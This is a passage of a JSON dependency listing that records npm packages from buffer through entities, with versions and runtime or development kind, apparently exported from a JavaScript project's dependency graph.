kind":"development","optional":false},{"id":14013848712,"package_name":"buffer-from@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848713,"package_name":"buffer@5.7.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848714,"package_name":"buffer@6.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848715,"package_name":"buffers@0.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848716,"package_name":"builtin-modules@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848717,"package_name":"bytes@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848718,"package_name":"bytes@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848719,"package_name":"cac@6.7.14","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848720,"package_name":"cacheable-lookup@5.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848721,"package_name":"cacheable-request@7.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848722,"package_name":"cachedir@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848724,"package_name":"caching-transform@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848725,"package_name":"call-bind@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848727,"package_name":"call-me-maybe@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848728,"package_name":"callsites@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848730,"package_name":"camelcase-css@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848732,"package_name":"camelcase-keys@6.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848734,"package_name":"camelcase-keys@7.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848736,"package_name":"camelcase@5.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848738,"package_name":"camelcase@6.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848740,"package_name":"caniuse-lite@1.0.30001457","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848742,"package_name":"caseless@0.12.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848744,"package_name":"ccount@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848746,"package_name":"centra@2.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848793,"package_name":"chai@4.3.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848794,"package_name":"chainsaw@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848795,"package_name":"chalk@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848796,"package_name":"chalk@2.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848798,"package_name":"chalk@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848800,"package_name":"chalk@4.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848801,"package_name":"chalk@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848802,"package_name":"char-regex@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848803,"package_name":"character-entities-legacy@1.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848804,"package_name":"character-entities@1.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848805,"package_name":"character-entities@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848806,"package_name":"character-reference-invalid@1.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848807,"package_name":"check-error@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848808,"package_name":"check-more-types@2.24.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848809,"package_name":"chokidar@3.5.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848810,"package_name":"chrome-trace-event@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848811,"package_name":"ci-info@3.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848812,"package_name":"cjs-module-lexer@1.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848813,"package_name":"cjson@0.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848904,"package_name":"clap@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849181,"package_name":"clean-regexp@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849182,"package_name":"clean-stack@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849183,"package_name":"clean-stack@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849184,"package_name":"clear-module@4.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849185,"package_name":"cli-boxes@2.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849186,"package_name":"cli-color@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849187,"package_name":"cli-cursor@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849188,"package_name":"cli-table3@0.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849189,"package_name":"cli-truncate@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849190,"package_name":"cli-truncate@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849191,"package_name":"cliui@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849192,"package_name":"cliui@8.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849193,"package_name":"clone-deep@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849194,"package_name":"clone-response@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849195,"package_name":"co@4.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849196,"package_name":"collect-v8-coverage@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849197,"package_name":"color-convert@1.9.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849198,"package_name":"color-convert@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849199,"package_name":"color-name@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849200,"package_name":"color-name@1.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013849201,"package_name":"color-string@1.9.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013849202,"package_name":"colorette@2.0.19","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849203,"package_name":"colorette@2.0.20","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849204,"package_name":"colors@0.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849237,"package_name":"combined-stream@1.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849238,"package_name":"commander@10.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849239,"package_name":"commander@2.20.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849240,"package_name":"commander@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013849241,"package_name":"commander@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849242,"package_name":"commander@6.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849243,"package_name":"commander@7.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013849244,"package_name":"comment-json@4.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849245,"package_name":"comment-parser@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849246,"package_name":"common-tags@1.8.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849247,"package_name":"commondir@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849248,"package_name":"compare-func@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849249,"package_name":"compressible@2.0.18","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849250,"package_name":"compression@1.7.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013849251,"package_name":"concat-map@0.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013849252,"package_name":"concurrently@8.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851115,"package_name":"configstore@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851116,"package_name":"connect-history-api-fallback@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851117,"package_name":"consola@3.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851118,"package_name":"content-disposition@0.5.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851119,"package_name":"content-type@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851120,"package_name":"conventional-changelog-angular@5.0.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851121,"package_name":"conventional-changelog-conventionalcommits@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851122,"package_name":"conventional-commits-parser@3.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851123,"package_name":"convert-source-map@1.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851124,"package_name":"convert-source-map@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851125,"package_name":"cookie-signature@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851126,"package_name":"cookie@0.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851127,"package_name":"core-js-compat@3.28.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851143,"package_name":"core-util-is@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851144,"package_name":"core-util-is@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851145,"package_name":"cors@2.8.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851146,"package_name":"cose-base@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851147,"package_name":"cose-base@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851157,"package_name":"cosmiconfig-typescript-loader@4.1.0(@types","ecosystem":"npm","requirements":"node@18.16.0)(cosmiconfig@8.0.0)(ts-node@10.9.1)(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013851338,"package_name":"cosmiconfig@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851339,"package_name":"cp-file@9.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851340,"package_name":"cpy-cli@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851389,"package_name":"cpy@9.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851415,"package_name":"create-require@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851416,"package_name":"cross-spawn@6.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851417,"package_name":"cross-spawn@7.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851418,"package_name":"crypto-random-string@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851419,"package_name":"cspell-dictionary@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851420,"package_name":"cspell-gitignore@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851437,"package_name":"cspell-glob@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851438,"package_name":"cspell-grammar@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851439,"package_name":"cspell-io@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851440,"package_name":"cspell-lib@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851441,"package_name":"cspell-trie-lib@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851442,"package_name":"cspell@6.31.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851443,"package_name":"css-tree@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851444,"package_name":"cssesc@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851445,"package_name":"cssom@0.3.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851446,"package_name":"cssom@0.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851447,"package_name":"cssstyle@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851448,"package_name":"cssstyle@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851449,"package_name":"csstree-validator@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851506,"package_name":"csstype@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851507,"package_name":"cuint@0.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851508,"package_name":"cypress-image-snapshot@4.0.1(cypress@12.10.0)(jest@29.5.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851513,"package_name":"cypress@12.10.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013851527,"package_name":"cytoscape-cose-bilkent@4.1.0(cytoscape@3.23.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851528,"package_name":"cytoscape-fcose@2.1.0(cytoscape@3.23.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851529,"package_name":"cytoscape@3.23.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851530,"package_name":"d3-array@2.12.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851531,"package_name":"d3-array@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851536,"package_name":"d3-axis@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851537,"package_name":"d3-brush@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851538,"package_name":"d3-chord@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851539,"package_name":"d3-color@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851540,"package_name":"d3-contour@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851781,"package_name":"d3-delaunay@6.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851786,"package_name":"d3-dispatch@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851787,"package_name":"d3-drag@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851788,"package_name":"d3-dsv@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851789,"package_name":"d3-ease@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851790,"package_name":"d3-fetch@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851791,"package_name":"d3-force@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851792,"package_name":"d3-format@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851793,"package_name":"d3-geo@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851847,"package_name":"d3-hierarchy@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851848,"package_name":"d3-interpolate@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851849,"package_name":"d3-path@1.0.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851850,"package_name":"d3-path@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851851,"package_name":"d3-polygon@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851852,"package_name":"d3-quadtree@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851853,"package_name":"d3-random@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851854,"package_name":"d3-sankey@0.12.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851855,"package_name":"d3-scale-chromatic@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851856,"package_name":"d3-scale@4.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851857,"package_name":"d3-selection@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851858,"package_name":"d3-shape@1.3.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851859,"package_name":"d3-shape@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851860,"package_name":"d3-time-format@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851861,"package_name":"d3-time@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851870,"package_name":"d3-timer@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851872,"package_name":"d3-transition@3.0.1(d3-selection@3.0.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851873,"package_name":"d3-zoom@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013851875,"package_name":"d3@7.8.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852360,"package_name":"d@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852361,"package_name":"dagre-d3-es@7.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852362,"package_name":"dargs@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852363,"package_name":"dashdash@1.14.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852364,"package_name":"data-uri-to-buffer@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852365,"package_name":"data-urls@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852366,"package_name":"data-urls@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852367,"package_name":"date-fns@2.29.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852368,"package_name":"dayjs@1.10.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852369,"package_name":"dayjs@1.11.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852370,"package_name":"debug@2.6.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852371,"package_name":"debug@3.2.7(supports-color@8.1.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852372,"package_name":"debug@4.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852373,"package_name":"debug@4.3.4(supports-color@8.1.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852374,"package_name":"decamelize-keys@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852379,"package_name":"decamelize@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852380,"package_name":"decamelize@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852381,"package_name":"decimal.js@10.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852382,"package_name":"decode-named-character-reference@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852383,"package_name":"decompress-response@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852384,"package_name":"dedent@0.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852385,"package_name":"deep-eql@4.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852386,"package_name":"deep-is@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852387,"package_name":"deepmerge@4.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852510,"package_name":"default-gateway@6.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852511,"package_name":"default-require-extensions@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852512,"package_name":"defer-to-connect@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852513,"package_name":"define-lazy-prop@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852514,"package_name":"define-properties@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852515,"package_name":"defu@6.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852516,"package_name":"delaunator@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852517,"package_name":"delayed-stream@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852518,"package_name":"depd@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852519,"package_name":"depd@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852520,"package_name":"dequal@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852521,"package_name":"destr@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852522,"package_name":"destroy@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852523,"package_name":"detect-newline@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852524,"package_name":"detect-node@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852525,"package_name":"didyoumean@1.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852526,"package_name":"diff-sequences@29.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852527,"package_name":"diff@4.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852528,"package_name":"diff@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852529,"package_name":"dir-glob@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852530,"package_name":"dlv@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013852531,"package_name":"dns-equal@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013852532,"package_name":"dns-packet@5.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856429,"package_name":"doctrine@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856432,"package_name":"dom-serializer@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856434,"package_name":"dom-to-image-more@2.16.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013856947,"package_name":"domelementtype@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856948,"package_name":"domexception@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856949,"package_name":"domhandler@5.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856950,"package_name":"dompurify@3.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013856951,"package_name":"domutils@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856952,"package_name":"dot-prop@5.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856953,"package_name":"dotenv@16.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856954,"package_name":"duplexer@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856955,"package_name":"eastasianwidth@0.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856956,"package_name":"ebnf-parser@0.1.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856965,"package_name":"ecc-jsbn@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856968,"package_name":"ee-first@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856971,"package_name":"ejs@3.1.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856974,"package_name":"electron-to-chromium@1.4.284","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856979,"package_name":"elkjs@0.8.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013856981,"package_name":"emittery@0.13.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856984,"package_name":"emoji-regex@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856986,"package_name":"emoji-regex@9.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856991,"package_name":"encodeurl@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856995,"package_name":"encoding@0.1.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856997,"package_name":"end-of-stream@1.4.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013856999,"package_name":"enhanced-resolve@5.15.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857001,"package_name":"enquirer@2.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857004,"package_name":"entities@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013857007,"package_name":"